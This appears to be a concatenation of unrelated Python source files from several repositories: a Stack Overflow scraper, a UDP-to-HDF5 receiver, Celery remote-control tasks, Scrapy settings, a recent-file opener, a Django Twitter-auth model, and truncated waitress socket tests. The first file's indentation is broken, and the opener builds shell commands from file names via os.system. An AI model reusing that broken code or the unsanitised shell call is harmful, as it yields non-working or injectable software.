Python
|
mit
| 1,775
|
class Stackoverflow:
def __init__(self):
self.post_texts = []
self.post_ratings = []
# use this method to grab all the information from the page and return
# a tuple (Question, Answers[], Ratings[])
def analyze_page(self, page, search):
try:
post_tags = page.soup.find_all('div', class_="post-text")
vote_tags = page.soup.find_all('span', class_="vote-count-post ")
for tag in post_tags:
self.post_texts.append(tag.text)
for tag in vote_tags:
self.post_ratings.append(int(tag.text))
        except Exception as e:
            print("ERROR in Stackoverflow: {}".format(e))
return (self.post_texts[0], self.post_texts[1:], self.post_ratings[1:])
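# Illustrative usage (a sketch; `page` is assumed to be an object exposing a parsed
# BeautifulSoup document as `page.soup`, e.g. a wrapper around a fetched results page):
#
#     so = Stackoverflow()
#     question, answers, ratings = so.analyze_page(page, "python list comprehension")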
|
Draps-/Nani
|
nani/interfaces/stackoverflow_interface.py
|
Python
|
mit
| 750
|
import socket
import time
import numpy as np
import struct
from pathlib import Path
try:
import h5py
except ImportError:
h5py = None
from . import NPKT
def udpunicast(
host: str,
port: int,
h5fn: Path = None,
Nupdate: int = 1000,
bufsize: int = 8192,
Nelbyte: int = 4,
N: int = NPKT,
timeout: float = 5.0,
):
"""
maxshape parameters:
limit ~ 100000*BUFSIZE to overfill hardrive with extremely fast demo
normally you would take other more sensible measures, and have sane datarates.
None means unlimited size (entire hard drive)
"""
# Do NOT connect or bind
with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as S:
S.settimeout(timeout)
first = True
if h5py is not None and h5fn:
h5 = h5py.File(h5fn, "w")
h5d = h5.create_dataset(
"/data",
dtype=np.float32,
chunks=True,
                shape=(Nupdate * bufsize // Nelbyte,),
                maxshape=(100000 * bufsize // Nelbyte,),
)
else:
h5 = h5d = None
# %% main loop
for i in range(N):
tic = time.time()
# %% host-> device
# host (other program) is programmed to send payload for any input--including simply '\n'
S.sendto(b"\n", (host, port, 0, 0))
# %% device -> host
print("recieving")
Nel = struct.unpack("<1L", S.recv(4))[0] # int len
print(Nel)
Nbyte_dg = Nel * Nelbyte
A = S.recv(Nbyte_dg)
if len(A) != Nbyte_dg:
print("unicast_rx: could not determine length")
continue
print(len(A))
# %% parse result
dat = struct.unpack(f"<{Nel:d}f", A)
if first: # to avoid having to restart C code each time
first = False
last = dat[0] - 1
rtoc = time.time() - tic
rtoc = np.mean((time.time() - tic, rtoc))
# %% optional write to disk
if h5 is not None:
h5d[i * Nel : (i + 1) * Nel] = dat
# %% progress report / writing
if not i % Nupdate:
print(rtoc, i)
h5 = _updatemsg(i, h5, h5d, Nupdate, bufsize, Nelbyte)
# %% data validation due to a priori pattern
# for single precision float, large integer jumps are experienced at large values by IEEE754 definition
# assert_allclose(diff(dat),1,err_msg=str(dat))
assert np.allclose(
last, dat[0] - 1
), f"{last} be mindful of min/max values of your datatype"
last = dat[-1]
if h5 is not None:
h5.close()
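# Illustrative call (a sketch; host, port and filename are hypothetical and must
# match whatever the companion C demo program is listening on):
#
#     udpunicast("::1", 2001, h5fn=Path("rx.h5"), Nupdate=1000)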
def _updatemsg(i: int, h5, h5d, Nupdate: int, bufsize: int, Nelbyte: int):
if h5 is not None:
h5.flush() # NOTE: every N loops to improve performance
try:
            h5d.resize((i + Nupdate) * bufsize // Nelbyte, axis=0)
except ValueError as e:
print(
"stopping HDF5 writing for this fast demo. in real life you can set maxshape=(None,) for no limit.",
e,
)
h5.close()
h5 = None
return h5
|
scivision/python_c_sockets
|
python_c_sockets/hdf.py
|
Python
|
mit
| 3,302
|
from __future__ import absolute_import
import time
import itertools
from celery import shared_task
import irsignal
@shared_task
def press_remote_buttons(devices_and_buttons_and_timeouts):
for device, button, timeout_in_s in grouper(
devices_and_buttons_and_timeouts, 3, 0):
irsignal.press_button(device, button)
time.sleep(timeout_in_s)
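# Illustrative call (a sketch; the device and button names are hypothetical
# LIRC-style identifiers. The flat list is consumed in (device, button, timeout)
# triples by grouper() below):
#
#     press_remote_buttons.delay(["tv", "KEY_POWER", 1.0, "tv", "KEY_HDMI1", 0.5])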
def grouper(iterable, n, fillvalue=None):
"""Collect data into fixed-length chunks or blocks (from the itertools
recipes).
grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
"""
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
@shared_task
def test():
print "the test task is running"
|
luke-moore/house
|
django/house/tasks.py
|
Python
|
mit
| 717
|
# -*- coding: utf-8 -*-
# Scrapy settings for browser_simulator project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'browser_simulator'
SPIDER_MODULES = ['browser_simulator.spiders']
NEWSPIDER_MODULE = 'browser_simulator.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'browser_simulator (+http://www.yourdomain.com)'
FEED_URI = '/Users/yuyanghe/Downloads/cs6262.csv'
FEED_FORMAT = 'CSV'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'browser_simulator.middlewares.BrowserSimulatorSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'browser_simulator.middlewares.MyCustomDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'browser_simulator.pipelines.BrowserSimulatorPipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
skihyy/GT-Spring-2017-CS6262
|
browser_simulator/browser_simulator/settings.py
|
Python
|
mit
| 3,334
|
from datetime import datetime
from argparse import ArgumentParser
import os
import sys
"""
Script to resume/open recently used files in a directory
"""
def get_recent_files(folder, file_filter, limit):
files = [os.path.join(folder, f) for f in os.listdir(folder)]
if file_filter:
files = list(filter(lambda f: f.endswith(file_filter), files))
recent = [(f, datetime.fromtimestamp(int(os.stat(f).st_ctime))) for f in files]
recent.sort(key=lambda a: a[-1], reverse=True)
return recent[:limit]
def get_parser():
parser = ArgumentParser(description="watch.py")
parser.add_argument('-l', '--limit', default=3, help='get #limit recent files')
parser.add_argument('-a', '--app', default=None, help='full path to specific app')
parser.add_argument('-d', '--dir', default=os.getcwd(), help='full path to directory')
parser.add_argument('-f', '--filter', default=None, help='filter file type e.g. mp4')
return parser
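# Illustrative invocation (a sketch; the directory, filter and app paths are hypothetical):
#
#     python resume.py -d ~/Movies -f mp4 -l 5 -a /Applications/VLC.app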
def io(options):
options.dir = os.path.expanduser(options.dir)
files = get_recent_files(options.dir, options.filter, options.limit)
for file, date in files:
ui = None
io_options = ['y', 'n', 'exit']
while (not ui or ui not in io_options):
ui = raw_input("Open {}? {}: ".format(file.rsplit('/')[-1], '/'.join(io_options)))
if (ui == 'exit'): sys.exit()
if (ui == 'y'):
cmd = 'open \'{}\''.format(file)
cmd = cmd if not options.app else '{} -a {}'.format(cmd, options.app)
os.system(cmd)
sys.exit()
if __name__ == '__main__':
parser = get_parser()
options = parser.parse_args()
io(options)
|
harshays/scripts
|
resume/resume.py
|
Python
|
mit
| 1,687
|
import base64
import os
from django.db import models
from django.conf import settings
from twython import Twython
class TwitterProfile(models.Model):
def __unicode__(self):
return self.username
def save(self, *args, **kwargs):
if not self.pk:
twitter = Twython(
settings.TWITTER_APP_KEY,
settings.TWITTER_APP_SECRET,
self.OAUTH_TOKEN,
self.OAUTH_TOKEN_SECRET
)
response = twitter.verify_credentials()
self.username = response['screen_name']
from django.contrib.auth import get_user_model
User = get_user_model()
# check if re-authenticating pre-existing Twitter user
_existing_user = User.objects.filter(username=self.username)
if _existing_user:
user = _existing_user[0]
profile = user.twitterprofile
profile.OAUTH_TOKEN = self.OAUTH_TOKEN
profile.OAUTH_TOKEN_SECRET = self.OAUTH_TOKEN_SECRET
profile.save()
return
            if getattr(settings, 'TWITTER_AUTH_RANDOM_PASSWORD', True):
password = base64.b64encode(os.urandom(16))
else:
password = ""
user = User.objects.create_user(
username=self.username,
password=password
)
self.user = user
super(TwitterProfile, self).save(*args, **kwargs)
OAUTH_TOKEN = models.CharField(max_length=199, blank=True, null=True)
OAUTH_TOKEN_SECRET = models.CharField(max_length=199, blank=True, null=True)
username = models.CharField(max_length=500, blank=True, null=True)
user = models.OneToOneField(settings.AUTH_USER_MODEL)
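# Illustrative Django settings consumed above (a sketch; the key and secret values
# are placeholders, not real credentials):
#
#     TWITTER_APP_KEY = '<consumer key>'
#     TWITTER_APP_SECRET = '<consumer secret>'
#     TWITTER_AUTH_RANDOM_PASSWORD = True  # False creates users with an empty password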
|
dylanbfox/simple-django-twitter-auth
|
django_twitter_auth/models.py
|
Python
|
mit
| 1,507
|
from waitress import wasyncore as asyncore
from waitress import compat
import contextlib
import functools
import gc
import unittest
import select
import os
import socket
import sys
import time
import errno
import re
import struct
import threading
import warnings
from io import BytesIO
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
HOST = 'localhost'
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == 'java': # pragma: no cover
# Jython disallows @ in module names
TESTFN = '$test'
else:
TESTFN = '@test'
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger(object): # pragma: no cover
def __init__(self):
self.messages = []
def log(self, severity, message):
self.messages.append((severity, message))
class WarningsRecorder(object): # pragma: no cover
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
@property
def warnings(self):
return self._warnings[self._last:]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False): # pragma: no cover
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get('__warningregistry__')
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules['warnings'].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if (re.match(msg, str(warning), re.I) and
issubclass(warning.__class__, cat)):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" %
missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs): # pragma: no cover
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get('quiet')
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
def gc_collect(): # pragma: no cover
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if sys.platform.startswith('java'):
time.sleep(0.1)
gc.collect()
gc.collect()
def threading_setup(): # pragma: no cover
return (compat.thread._count(), None)
def threading_cleanup(*original_values): # pragma: no cover
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = (compat.thread._count(), None)
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
sys.stderr.write(
"Warning -- threading_cleanup() failed to cleanup "
"%s threads" % (values[0] - original_values[0])
)
sys.stderr.flush()
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func): # pragma: no cover
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
def join_thread(thread, timeout=30.0): # pragma: no cover
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = "failed to join the thread in %.1f seconds" % timeout
raise AssertionError(msg)
def bind_port(sock, host=HOST): # pragma: no cover
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, 'SO_REUSEADDR'):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise RuntimeError("tests should never set the SO_REUSEADDR " \
"socket option on TCP/IP sockets!")
if hasattr(socket, 'SO_REUSEPORT'):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEPORT " \
"socket option on TCP/IP sockets!")
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, 'SO_EXCLUSIVEADDRUSE'):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
@contextlib.contextmanager
def closewrapper(sock): # pragma: no cover
try:
yield sock
finally:
sock.close()
class dummysocket: # pragma: no cover
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
def setblocking(self, yesno):
self.isblocking = yesno
def getpeername(self):
return 'peername'
class dummychannel: # pragma: no cover
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy: # pragma: no cover
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):  # pragma: no cover
try:
serv.listen(0)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_unix_socket(sock, addr): # pragma: no cover
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest('cannot bind AF_UNIX sockets')
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
bind_unix_socket(sock, addr)
else:
sock.bind(addr)
if sys.platform.startswith("win"): # pragma: no cover
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or '.'
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an i7@4.3GHz shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn('tests may fail, delete still pending for ' + pathname,
RuntimeWarning, stacklevel=4)
def _unlink(filename):
_waitfor(os.unlink, filename)
else:
_unlink = os.unlink
def unlink(filename):
try:
_unlink(filename)
except OSError:
pass
def _is_ipv6_enabled(): # pragma: no cover
"""Check whether IPv6 is enabled on this host."""
if compat.HAS_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(('::1', 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
# def handle_error(self):
# self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_wasyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(
repr(d),
'<waitress.wasyncore.dispatcher at %#x>' % id(d)
)
def test_log_info(self):
import logging
inst = asyncore.dispatcher(map={})
logger = DummyLogger()
inst.logger = logger
inst.log_info('message', 'warning')
self.assertEqual(logger.messages, [(logging.WARN, 'message')])
def test_log(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.log('message')
self.assertEqual(logger.messages, [(logging.DEBUG, 'message')])
def test_unhandled(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.handle_expt()
inst.handle_read()
inst.handle_write()
inst.handle_connect()
expected = [(logging.WARN, 'unhandled incoming priority event'),
(logging.WARN, 'unhandled read event'),
(logging.WARN, 'unhandled write event'),
(logging.WARN, 'unhandled connect event')]
self.assertEqual(logger.messages, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send): # pragma: no cover
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0: # pragma: no cover
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
got_warning = False
while got_warning is False:
            # we try until we get the outcome we want because this
            # test is not deterministic (gc_collect() may not collect the
            # file_wrapper and emit the ResourceWarning on every pass)
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
try:
with check_warnings(('', compat.ResourceWarning)):
f = None
gc_collect()
except AssertionError: # pragma: no cover
pass
else:
got_warning = True
def test_close_twice(self):
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher): # pragma: no cover
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self): # pragma: no cover
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
